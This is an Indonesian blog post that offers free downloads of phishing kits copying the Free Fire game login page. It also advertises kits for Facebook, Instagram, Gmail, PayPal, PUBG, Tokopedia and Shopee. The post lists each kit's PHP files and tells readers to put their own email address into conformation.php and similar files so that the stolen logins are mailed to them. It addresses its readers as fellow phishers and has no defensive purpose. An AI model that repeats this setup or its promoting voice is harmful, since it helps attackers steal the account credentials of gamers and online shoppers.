Download Script Phising Free Fire (FF) Send Mail Terbaru

Hai sobat phiser, kali ini saya akan bagi-bagi script phising terbaru nih. dan kamu bisa download script phising Free Fire nya di sini gratis, ga perlu bayar dan nggak bakal nyasar. Cara download script phising FF di sini itu mudah.

Ga make link konventer yang bikin kalian muter-muter ga jelas dan yang ada kamu di arahin ke website yang isinya virus.

Dari pengalaman itulah website ini saya buat. biar kamu itu mudah untuk mendownload script phisingnya.

Oh ya, bukan hanya script phising free fire aja yang bisa kamu download di sini, ada banyak script phising yang bisa kamu download seperti:

Artikel Keren Lainnya:  Cara Mengetahui Nomor Hp Teman di Facebook

Download Script Phising

  • Script phising facebook
  • Script phising Instagram
  • Script phising Gmail
  • Script phising PayPal
  • Script phising PUBG
  • Script phising Bukalapak
  • Script phising Tokopedia
  • Script phising Lazada
  • Script phising Shopee

Nah dibawah ini ada beberapa macam tampilan script phising FF yang bisa kamu download. Tinggal pilih mau tampilan yang kaya apa.

Download Script Phising FF

Download script phising free fire

Untuk cara membuat web phisingnya silahkan kamu baca di artikel saya tentang cara membuat web phising FF gratis.

Script Phising FF Bandit

Live Demo
Isi File SC FF Bandit:

  • ui
  • js
  • gam
  • css
  • ccss
  • MACOSX
  • success.php
  • skin.php
  • processing.php
  • login.php
  • jquery.min.js
  • index.html
  • email.php
  • detail.php
  • cilepeung.php
  • bosstrap.min.js
  • dll
Artikel Keren Lainnya:  Aplikasi dan Cara Hack WiFi Menggunakan Android

Jangan lupa ganti alamat email di dalam script phising tersebut menjadi alamat email kamu.

Script Phising Free Fire (SFILE.MOBI)

Live Demo
Isi File SC Free Fire:

  • ui_imgg
  • js
  • imgg
  • fonts
  • css
  • img
  • fonsawesome.io
  • successvk.php
  • successfb.php
  • baca.txt
  • index.php
  • loginform.php
  • choose.html
  • conformation.php
  • bundle.js
  • style.css
  • bootsrap.min.css
  • dll

Ubah bagian “emailkamu@gmail.com” yang ada di file conformation.php, successvk.php dan successfb.php menjadi alamat email Anda:

  • $emailkamu = “kecutmasih10@gmail.com”;$tomail
  • $emailkamu;

Script Phising FF Terbaru 2019

Script phising free fire

Script phising tampilan terbaru 2019 download di sini.

Script Phising Uhuinfo

Live Demo
Isi File SC FF Uhuinfo:

  • uhu
  • modernizr-2.8.3.min.js
  • jquery-migrate-1.2.1.min.js
  • jquery-1.1.1.1.min.js
  • bootstrap.js
  • dll

Seperti biasa, ganti email di dalam script tersebut dan ganti menjadi alamat email kamu.Itulah beberapa penampakan Script phising Free Fire yang bisa kamu download. dan…. selamat memcoba membuat web phising free fire. Jangan lupa, bagikan ke teman-teman kamu yah, yang lagi nyari script phising… Jangan lupa subcribe website ini, biar setiap ada SC phising baru kamu jadi orang pertama yang download. terimakasih!

Artikel Keren Lainnya:  Google Dork Menggunaka gD0rk Tool Automatis

Satu tanggapan pada “Download Script Phising Free Fire (FF) Send Mail Terbaru

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *